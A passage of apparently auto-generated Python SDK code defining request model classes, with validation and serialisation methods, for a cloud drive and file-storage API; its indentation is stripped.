self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.custom_index_key, 'custom_index_key')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 0)
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.starred is not None:
result['Starred'] = self.starred
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.category is not None:
result['category'] = self.category
if self.custom_index_key is not None:
result['custom_index_key'] = self.custom_index_key
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.fields is not None:
result['fields'] = self.fields
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.order_direction is not None:
result['order_direction'] = self.order_direction
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.status is not None:
result['status'] = self.status
if self.type is not None:
result['type'] = self.type
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('Starred') is not None:
self.starred = m.get('Starred')
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('category') is not None:
self.category = m.get('category')
if m.get('custom_index_key') is not None:
self.custom_index_key = m.get('custom_index_key')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('fields') is not None:
self.fields = m.get('fields')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('order_direction') is not None:
self.order_direction = m.get('order_direction')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class ListFileDeltaRequest(TeaModel):
"""
获取增量文件操作记录
"""
def __init__(
self,
cursor: str = None,
drive_id: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
video_thumbnail_process: str = None,
):
# cursor 游标
self.cursor = cursor
# drive_id
self.drive_id = drive_id
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
default 100
self.limit = limit
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
def to_map(self):
result = dict()
if self.cursor is not None:
result['cursor'] = self.cursor
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('cursor') is not None:
self.cursor = m.get('cursor')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class ListFileRequest(TeaModel):
"""
列举文件
"""
def __init__(
self,
addition_data: dict = None,
all: bool = None,
category: str = None,
drive_id: str = None,
fields: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
location: str = None,
marker: str = None,
order_by: str = None,
order_direction: str = None,
parent_file_id: str = None,
parent_file_id_path: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
starred: bool = None,
status: str = None,
type: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# all
self.all = all
# category
self.category = category
# drive_id
self.drive_id = drive_id
# fields
self.fields = fields
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# location
self.location = location
# marker
self.marker = marker
# order_by
self.order_by = order_by
# order_direction
self.order_direction = order_direction
# ParentFileID
self.parent_file_id = parent_file_id
self.parent_file_id_path = parent_file_id_path
self.referer = referer
# share_id, either share_id or drive_id is required
self.share_id = share_id
self.sign_token = sign_token
# starred
self.starred = starred
# status
self.status = status
# type
self.type = type
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 0)
self.validate_required(self.parent_file_id, 'parent_file_id')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9.-_]{1,50}')
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.all is not None:
result['all'] = self.all
if self.category is not None:
result['category'] = self.category
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.fields is not None:
result['fields'] = self.fields
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.location is not None:
result['location'] = self.location
if self.marker is not None:
result['marker'] = self.marker
if self.order_by is not None:
result['order_by'] = self.order_by
if self.order_direction is not None:
result['order_direction'] = self.order_direction
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.parent_file_id_path is not None:
result['parent_file_id_path'] = self.parent_file_id_path
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.type is not None:
result['type'] = self.type
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('all') is not None:
self.all = m.get('all')
if m.get('category') is not None:
self.category = m.get('category')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('fields') is not None:
self.fields = m.get('fields')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('order_by') is not None:
self.order_by = m.get('order_by')
if m.get('order_direction') is not None:
self.order_direction = m.get('order_direction')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('parent_file_id_path') is not None:
self.parent_file_id_path = m.get('parent_file_id_path')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class ListMyDriveRequest(TeaModel):
"""
List my drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
limit: int = None,
marker: str = None,
):
self.headers = headers
# 每页大小限制
self.limit = limit
# 翻页标记, 接口返回的标记值
self.marker = marker
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
return self
class ListShareLinkRequest(TeaModel):
"""
list_share_link request
"""
def __init__(
self,
creator: str = None,
limit: int = None,
marker: str = None,
):
# creator
self.creator = creator
# limit
self.limit = limit
# marker
self.marker = marker
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.creator is not None:
result['creator'] = self.creator
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
return self
class ListShareRequest(TeaModel):
"""
list share request
"""
def __init__(
self,
headers: Dict[str, str] = None,
creator: str = None,
drive_id: str = None,
limit: int = None,
marker: str = None,
owner: str = None,
owner_type: str = None,
share_file_path: str = None,
):
self.headers = headers
# creator
self.creator = creator
self.drive_id = drive_id
# limit
self.limit = limit
# marker
self.marker = marker
# Owner
self.owner = owner
# owner_type
self.owner_type = owner_type
# share_file_path
self.share_file_path = share_file_path
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.creator is not None:
result['creator'] = self.creator
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.owner is not None:
result['owner'] = self.owner
if self.owner_type is not None:
result['owner_type'] = self.owner_type
if self.share_file_path is not None:
result['share_file_path'] = self.share_file_path
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('owner_type') is not None:
self.owner_type = m.get('owner_type')
if m.get('share_file_path') is not None:
self.share_file_path = m.get('share_file_path')
return self
class ListStoreFileRequest(TeaModel):
"""
list store file
"""
def __init__(
self,
headers: Dict[str, str] = None,
limit: int = None,
marker: str = None,
parent_file_path: str = None,
store_id: str = None,
type: str = None,
):
self.headers = headers
# limit
self.limit = limit
# marker
self.marker = marker
# parent_file_path
self.parent_file_path = parent_file_path
# store_id
self.store_id = store_id
# type
self.type = type
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 1000)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.store_id is not None:
result['store_id'] = self.store_id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class ListStoreRequest(TeaModel):
"""
list storage file
"""
def __init__(
self,
domain_id: str = None,
):
# domain_id
self.domain_id = domain_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class ListUploadedPartRequest(TeaModel):
"""
列举uploadID对应的已上传分片
"""
def __init__(
self,
drive_id: str = None,
file_id: str = None,
file_id_path: str = None,
limit: int = None,
part_number_marker: int = None,
share_id: str = None,
upload_id: str = None,
):
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
# limit
self.limit = limit
# part_number_marker
self.part_number_marker = part_number_marker
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.limit is not None:
self.validate_pattern(self.limit, 'limit', '[0-9]+')
self.validate_maximum(self.limit, 'limit', 1000)
self.validate_minimum(self.limit, 'limit', 1)
if self.part_number_marker is not None:
self.validate_pattern(self.part_number_marker, 'part_number_marker', '[0-9]+')
self.validate_minimum(self.part_number_marker, 'part_number_marker', 1)
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.limit is not None:
result['limit'] = self.limit
if self.part_number_marker is not None:
result['part_number_marker'] = self.part_number_marker
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('part_number_marker') is not None:
self.part_number_marker = m.get('part_number_marker')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class MoveFileRequest(TeaModel):
"""
文件移动请求
"""
def __init__(
self,
auto_rename: bool = None,
drive_id: str = None,
file_id: str = None,
file_id_path: str = None,
new_name: str = None,
share_id: str = None,
to_drive_id: str = None,
to_parent_file_id: str = None,
to_share_id: str = None,
):
# auto_rename
self.auto_rename = auto_rename
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
# new_name
self.new_name = new_name
self.share_id = share_id
# to_drive_id
self.to_drive_id = to_drive_id
# to_parent_file_id
self.to_parent_file_id = to_parent_file_id
self.to_share_id = to_share_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.new_name is not None:
self.validate_max_length(self.new_name, 'new_name', 1024)
if self.to_drive_id is not None:
self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
self.validate_required(self.to_parent_file_id, 'to_parent_file_id')
if self.to_parent_file_id is not None:
self.validate_max_length(self.to_parent_file_id, 'to_parent_file_id', 50)
if self.to_share_id is not None:
self.validate_pattern(self.to_share_id, 'to_share_id', '[0-9]+')
def to_map(self):
result = dict()
if self.auto_rename is not None:
result['auto_rename'] = self.auto_rename
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.new_name is not None:
result['new_name'] = self.new_name
if self.share_id is not None:
result['share_id'] = self.share_id
if self.to_drive_id is not None:
result['to_drive_id'] = self.to_drive_id
if self.to_parent_file_id is not None:
result['to_parent_file_id'] = self.to_parent_file_id
if self.to_share_id is not None:
result['to_share_id'] = self.to_share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auto_rename') is not None:
self.auto_rename = m.get('auto_rename')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('new_name') is not None:
self.new_name = m.get('new_name')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('to_drive_id') is not None:
self.to_drive_id = m.get('to_drive_id')
if m.get('to_parent_file_id') is not None:
self.to_parent_file_id = m.get('to_parent_file_id')
if m.get('to_share_id') is not None:
self.to_share_id = m.get('to_share_id')
return self
class PlayMediaRequest(TeaModel):
"""
play_media request
"""
def __init__(
self,
auth_key: str = None,
drive_id: str = None,
file_id: str = None,
):
# auth_key
self.auth_key = auth_key
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
self.validate_required(self.auth_key, 'auth_key')
if self.auth_key is not None:
self.validate_pattern(self.auth_key, 'auth_key', '[a-z0-9]+')
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.auth_key is not None:
result['AuthKey'] = self.auth_key
if self.drive_id is not None:
result['DriveID'] = self.drive_id
if self.file_id is not None:
result['FileID'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('AuthKey') is not None:
self.auth_key = m.get('AuthKey')
if m.get('DriveID') is not None:
self.drive_id = m.get('DriveID')
if m.get('FileID') is not None:
self.file_id = m.get('FileID')
return self
class RefreshOfficeEditTokenRequest(TeaModel):
"""
刷新office文档在线编辑凭证
"""
def __init__(
self,
addition_data: dict = None,
location: str = None,
office_access_token: str = None,
office_refresh_token: str = None,
):
# addition_data
self.addition_data = addition_data
# location
self.location = location
# AccessToken
self.office_access_token = office_access_token
# RefreshToken
self.office_refresh_token = office_refresh_token
def validate(self):
self.validate_required(self.office_access_token, 'office_access_token')
self.validate_required(self.office_refresh_token, 'office_refresh_token')
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.location is not None:
result['location'] = self.location
if self.office_access_token is not None:
result['office_access_token'] = self.office_access_token
if self.office_refresh_token is not None:
result['office_refresh_token'] = self.office_refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('office_access_token') is not None:
self.office_access_token = m.get('office_access_token')
if m.get('office_refresh_token') is not None:
self.office_refresh_token = m.get('office_refresh_token')
return self
class ScanFileMetaRequest(TeaModel):
"""
全量获取file元信息的请求body
"""
def __init__(
self,
addition_data: dict = None,
category: str = None,
drive_id: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
marker: str = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# category
self.category = category
# drive_id
self.drive_id = drive_id
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# marker
self.marker = marker
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 5000)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.category is not None:
result['category'] = self.category
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('category') is not None:
self.category = m.get('category')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class SearchFileRequest(TeaModel):
"""
搜索文件元数据
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
location: str = None,
marker: str = None,
order_by: str = None,
query: str = None,
referer: str = None,
return_total_count: bool = None,
sign_token: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# location
self.location = location
# Marker
self.marker = marker
# order_by
self.order_by = order_by
# query
self.query = query
# referer
self.referer = referer
# return_total_count 是否返回查询总数
self.return_total_count = return_total_count
# sign_token
self.sign_token = sign_token
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
if self.query is not None:
self.validate_max_length(self.query, 'query', 4096)
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.location is not None:
result['location'] = self.location
if self.marker is not None:
result['marker'] = self.marker
if self.order_by is not None:
result['order_by'] = self.order_by
if self.query is not None:
result['query'] = self.query
if self.referer is not None:
result['referer'] = self.referer
if self.return_total_count is not None:
result['return_total_count'] = self.return_total_count
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('order_by') is not None:
self.order_by = m.get('order_by')
if m.get('query') is not None:
self.query = m.get('query')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('return_total_count') is not None:
self.return_total_count = m.get('return_total_count')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class UCGetObjectInfoByObjectKeyRequest(TeaModel):
"""
UCGetObjectInfoByObjectKeyRequest
"""
def __init__(
self,
object_key: str = None,
):
self.object_key = object_key
def validate(self):
pass
def to_map(self):
result = dict()
if self.object_key is not None:
result['object_key'] = self.object_key
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('object_key') is not None:
self.object_key = m.get('object_key')
return self
class UCGetObjectInfoBySha1Request(TeaModel):
"""
UCGetObjectInfoBySha1Request
"""
def __init__(
self,
sha_1: str = None,
):
self.sha_1 = sha_1
def validate(self):
pass
def to_map(self):
result = dict()
if self.sha_1 is not None:
result['sha1'] = self.sha_1
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('sha1') is not None:
self.sha_1 = m.get('sha1')
return self
class UpdateDriveRequest(TeaModel):
"""
Update drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
description: str = None,
drive_id: str = None,
drive_name: str = None,
encrypt_data_access: bool = None,
encrypt_mode: str = None,
status: str = None,
total_size: int = None,
):
self.headers = headers
# 描述信息
self.description = description
# Drive ID
self.drive_id = drive_id
# Drive 名称
self.drive_name = drive_name
# 授权访问加密数据
self.encrypt_data_access = encrypt_data_access
# 加密模式
self.encrypt_mode = encrypt_mode
# 状态
self.status = status
# 总大小,单位Byte [如果设置 -1 代表不限制]
self.total_size = total_size
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.drive_id, 'drive_id')
if self.drive_name is not None:
self.validate_max_length(self.drive_name, 'drive_name', 1024)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.description is not None:
result['description'] = self.description
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.drive_name is not None:
result['drive_name'] = self.drive_name
if self.encrypt_data_access is not None:
result['encrypt_data_access'] = self.encrypt_data_access
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.status is not None:
result['status'] = self.status
if self.total_size is not None:
result['total_size'] = self.total_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('drive_name') is not None:
self.drive_name = m.get('drive_name')
if m.get('encrypt_data_access') is not None:
self.encrypt_data_access = m.get('encrypt_data_access')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('total_size') is not None:
self.total_size = m.get('total_size')
return self
class UpdateFileMetaRequest(TeaModel):
"""
更新文件元数据
"""
def __init__(
self,
check_name_mode: str = None,
custom_index_key: str = None,
description: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_id: str = None,
file_id_path: str = None,
hidden: bool = None,
labels: List[str] = None,
meta: str = None,
name: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
